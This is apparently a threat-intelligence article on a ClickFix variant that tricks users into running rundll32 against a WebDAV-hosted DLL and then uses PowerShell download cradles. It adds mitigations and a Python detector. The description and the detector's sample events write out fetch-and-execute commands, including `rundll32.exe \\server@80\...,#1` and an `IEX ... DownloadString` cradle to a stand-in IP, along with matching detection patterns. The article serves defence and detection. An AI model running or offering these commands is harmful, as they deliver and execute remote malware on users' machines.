New ClickFix Variant Exploits Rundll32 and WebDAV to Evade Detection
A recent evolution of the ClickFix technique has emerged that poses a significant threat to Windows users. Instead of relying on a scripting engine, the new variant abuses two native Windows components, `rundll32.exe` and the WebDAV mini-redirector, to fetch and execute a malicious DLL straight from an attacker-controlled server. Because the first stage never touches PowerShell or another script host, it slips past security controls that focus on script-based threats.
Understanding ClickFix Attacks
ClickFix attacks are social engineering schemes that trick users into running harmful commands on their own systems. The lure is typically a fake prompt, CAPTCHA or error message that instructs the user to perform a specific action, such as opening the Windows Run dialog and entering a command. The command often looks harmless, but it is crafted to download and execute malware; because the victim runs it by hand, no software vulnerability is needed.
The New Variant’s Methodology
In this latest iteration, attackers have refined their tactics to enhance stealth and effectiveness:
1. Deceptive Webpage: Victims are directed to a counterfeit website masquerading as a CAPTCHA verification page. An example of such a site is healthybyhillary[.]com, which instructs users to press `Win + R` to open the Run dialog, paste the command the page has already placed on the clipboard with `Ctrl + V`, and press `Enter` to execute it. Each step looks like an ordinary verification routine, which is what makes the lure effective.
2. Utilization of Rundll32 and WebDAV: Instead of employing commonly monitored scripting engines like PowerShell, the pasted command runs `rundll32.exe` against a path served by the WebDAV mini-redirector (the WebClient service). The `@80` suffix on the host portion of a UNC path tells the mini-redirector to fetch the file over HTTP on port 80, so Windows presents the remote file as if it sat on a network share. The observed command takes the form `rundll32.exe \\server@80\verification.google,#1`: rundll32 loads `verification.google` as a DLL regardless of its extension, and `#1` selects the export to call by ordinal rather than by name, which removes a readable function name from the command line.
3. In-Memory Execution: After the initial command, the chain proceeds through multiple stages that reside almost entirely in memory. It transitions to PowerShell only at a later stage, using `Invoke-Expression` (alias `IEX`) and `Net.WebClient.DownloadString` to fetch and execute additional payloads without writing them to disk. The PowerShell process is launched with switches such as `-NoP` (no profile) and `-NonI` (non-interactive) so that it runs quietly and without user prompts.
Implications for Security
This advanced approach presents several challenges for cybersecurity defenses:
– Evasion of Detection: By exploiting trusted system tools like `rundll32.exe` and WebDAV, the first stage blends with legitimate Windows activity. Security solutions that focus on script-based threats, or that only inspect what PowerShell executes, may not see the initial DLL load at all.
– Minimal Disk Footprint: The in-memory strategy leaves little on disk, which complicates forensic analysis and removal. It is not traceless, however: the typed command is recorded in the user's Run dialog history (the `RunMRU` registry key), the `rundll32.exe` launch appears in process-creation telemetry with `explorer.exe` as its parent, and the WebDAV fetch passes through the WebClient service and any web proxy on its path.
Recommendations for Mitigation
To defend against this sophisticated attack vector, organizations and individuals should consider the following measures:
1. User Education: Train users to recognize and refuse instructions to run commands from unverified sources, even when they are framed as a CAPTCHA check or an error fix. No legitimate verification step requires pasting a command into the Run dialog.
2. Enhanced Monitoring: Alert on `rundll32.exe` launched with a UNC module path, especially one containing `@80`, `@SSL` or `DavWWWRoot`, or with an entry point given by ordinal (`#1`); on `rundll32.exe` spawned by `explorer.exe`, the parent of anything started from the Run dialog; on outbound WebDAV traffic from the WebClient service to hosts outside the organization; and on PowerShell command lines that combine `-NoP`/`-NonI` with `IEX` and `DownloadString`.
3. Restrict Unnecessary Features: If WebDAV is not required for business operations, stop and disable the WebClient service, which implements the mini-redirector; without it, `\\host@port\` paths do not resolve and this first stage fails. Where users have no need for the Run dialog, Group Policy can remove it from the Start menu, which also blocks the `Win + R` shortcut the lure depends on.
4. Regular Updates: Keep all systems and security software up to date to benefit from the latest threat intelligence and protective measures.
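The following detector, added here as an example and not tooling from the original report, runs the monitoring logic of recommendation 2 over the command shapes described in methodology steps 2 and 3. It parses `rundll32.exe` command lines, reconstructs the URL that the WebDAV mini-redirector would fetch for a `\\host@port\` or `\\host@SSL\` path, flags ordinal entry points, and separately flags PowerShell command lines that pair quiet-mode switches with an `IEX` + `DownloadString` cradle. The event records are constructed in the shape of process-creation telemetry; the hosts, paths and PIDs in them are invented for the example.

```python
"""Flag rundll32-over-WebDAV and PowerShell download-cradle process launches.

Example code added to this article; the sample events below are constructed,
not telemetry from the incident described.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample telemetry (Sysmon Event ID 1 style). Anything started from
# the Run dialog is a child of explorer.exe, hence that parent on the lure rows.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe",
     "cmdline": r"rundll32.exe \\server@80\verification.google,#1"},
    {"pid": 4188, "parent": "explorer.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" \\cdn.example.test@SSL@443\DavWWWRoot\v.dat,#2'},
    {"pid": 2200, "parent": "svchost.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"pid": 5012, "parent": "cmd.exe",
     "cmdline": r'''powershell.exe -NoP -NonI -W Hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')"'''},
    {"pid": 5100, "parent": "explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]

# \\host@port\path, \\host@SSL\path and \\host@SSL@port\path are the forms the
# WebDAV mini-redirector (WebClient service) maps onto an HTTP(S) URL.
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[^\\@\s,]+)(?:@(?P<ssl>SSL))?(?:@(?P<port>\d{1,5}))?\\(?P<path>[^\s,]+)",
    re.IGNORECASE,
)
# Documented rundll32 syntax: rundll32 <module>,<entrypoint> [arguments]
RUNDLL32_CMD = re.compile(
    r'^\s*(?:"[^"]*rundll32(?:\.exe)?"|\S*rundll32(?:\.exe)?)\s+(?P<module>[^,]+?),(?P<entry>\S+)',
    re.IGNORECASE,
)
POWERSHELL_CMD = re.compile(r'^\s*"?(?:[^\s"]*\\)?(?:powershell|pwsh)(?:\.exe)?"?\s', re.IGNORECASE)


def webdav_url(unc: str) -> Optional[str]:
    """URL the WebClient service would fetch for a WebDAV-style UNC path, or None
    for a plain \\host\share path (which Windows tries over SMB first)."""
    m = WEBDAV_UNC.fullmatch(unc)
    if not m:
        return None
    parts = m["path"].split("\\")
    explicit_dav = parts[0].lower() == "davwwwroot"  # DavWWWRoot forces the WebDAV provider
    if explicit_dav:
        parts = parts[1:]
    if not (m["ssl"] or m["port"] or explicit_dav):
        return None
    scheme = "https" if m["ssl"] else "http"
    netloc = m["host"] if m["port"] is None else f'{m["host"]}:{m["port"]}'
    return f"{scheme}://{netloc}/" + "/".join(parts)


def analyze_rundll32(cmdline: str) -> Optional[list]:
    """Reasons a rundll32 launch is suspicious ([] if benign); None if not rundll32."""
    m = RUNDLL32_CMD.match(cmdline)
    if not m:
        return None
    module, entry = m["module"].strip().strip('"'), m["entry"]
    reasons = []
    url = webdav_url(module)
    if url:
        reasons.append(f"module fetched over WebDAV: {url}")
    if re.fullmatch(r"#\d+", entry):
        reasons.append(f"export called by ordinal ({entry}), no readable function name")
    if url and not module.lower().endswith(".dll"):
        reasons.append("remote module lacks a .dll extension; rundll32 loads it anyway")
    return reasons


def analyze_powershell(cmdline: str) -> Optional[list]:
    """Reasons a PowerShell launch is suspicious ([] if benign); None if not PowerShell."""
    if not POWERSHELL_CMD.match(cmdline):
        return None
    reasons = []
    if re.search(r"-nop\w*\b", cmdline, re.IGNORECASE):
        reasons.append("-NoProfile")
    if re.search(r"-noni\w*\b", cmdline, re.IGNORECASE):
        reasons.append("-NonInteractive")
    if re.search(r"-w\w*\s+hidden\b", cmdline, re.IGNORECASE):
        reasons.append("hidden window")
    cradle = (re.search(r"\b(?:iex|invoke-expression)\b", cmdline, re.IGNORECASE)
              and re.search(r"downloadstring|net\.webclient", cmdline, re.IGNORECASE))
    if cradle:
        reasons.append("in-memory download cradle (IEX + DownloadString)")
    # A lone -NoProfile is routine for scheduled admin scripts; require a cradle
    # or a combination of quiet-mode switches before reporting.
    return reasons if (cradle or len(reasons) >= 2) else []


@dataclass
class Finding:
    pid: int
    parent: str
    cmdline: str
    reasons: list


def scan(events) -> list:
    findings = []
    for ev in events:
        reasons = analyze_rundll32(ev["cmdline"])
        if reasons is None:
            reasons = analyze_powershell(ev["cmdline"])
        if not reasons:
            continue
        if ev["parent"].lower() == "explorer.exe":
            reasons.append("parent is explorer.exe, consistent with a Win+R launch")
        findings.append(Finding(ev["pid"], ev["parent"], ev["cmdline"], reasons))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"PID {f.pid} (parent {f.parent}): {f.cmdline}")
        for r in f.reasons:
            print("   -", r)
```

On the constructed sample, the two rundll32 launches over WebDAV and the PowerShell cradle are reported, while the `shell32.dll,Control_RunDLL` launch and the scheduled `-NoProfile` script are not. The plain-UNC case is deliberately left unflagged by `webdav_url`, because `\\host\share` is served by SMB when that succeeds and only falls back to WebDAV; if SMB egress is already blocked at the perimeter, treating any UNC module path as WebDAV-capable is the stricter and reasonable choice.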
By understanding the mechanics of this new ClickFix variant and implementing proactive security practices, organizations can better protect themselves against such evasive threats.